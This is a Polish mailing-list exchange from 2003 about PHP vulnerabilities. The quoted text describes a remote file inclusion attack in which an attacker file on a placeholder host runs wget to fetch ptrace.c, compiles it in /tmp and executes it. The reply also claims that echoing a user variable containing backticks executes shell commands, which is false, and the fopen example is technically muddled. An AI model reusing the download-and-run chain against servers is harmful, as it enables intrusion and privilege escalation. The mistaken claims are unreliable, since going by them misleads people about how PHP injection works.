Hello BadBorys, Monday, April 28, 2003, 9:18:50 PM, you wrote:
> Witaj Tomasz, > W Twoim liście datowanym 27 kwietnia 2003 (15:57:38) można przeczytać: TTC>> Juz skasowalem raport w ktorym mialem to opisane. TTC>> ale mniej wiecej: TTC>> na stronie jest sobie fopen($filename.$prefix) TTC>> wejscie na strone &filename=http://foo.com/exploit&prefix=txt TTC>> a w pliku na http://foo.com/exploit.txt: TTC>> system("uname -a"); TTC>> system("wget http://foo.com/ptrace.c"); TTC>> system("gcc -o /tmp/str ptrace.c"); TTC>> system("/tmp/str"); > Cos mi tu nie gra. Nie twierdze, ze php nie jest 'expoitable', ale na > pewno nie jest to takie proste. Bo niby dlaczego *otwarcie* jakiegos > pliku (nawet na zdalnej maszynie) mialoby spowodowac jego > *wykonanie*?? mozna dorzucic zla obsluge tzw. backticks czy jakos (odwrotny apostrof) wyswietlenie zmiennej ktorej jako parametr poda sie np 'ls' powoduje wykonanie tego polecenia i wyswietlenie wynikow przykladowo: <? echo $a; ?> gdzie $a to zmienna pobierana prosto od uzytkownika -- Best regards, Leaf mailto:[EMAIL PROTECTED]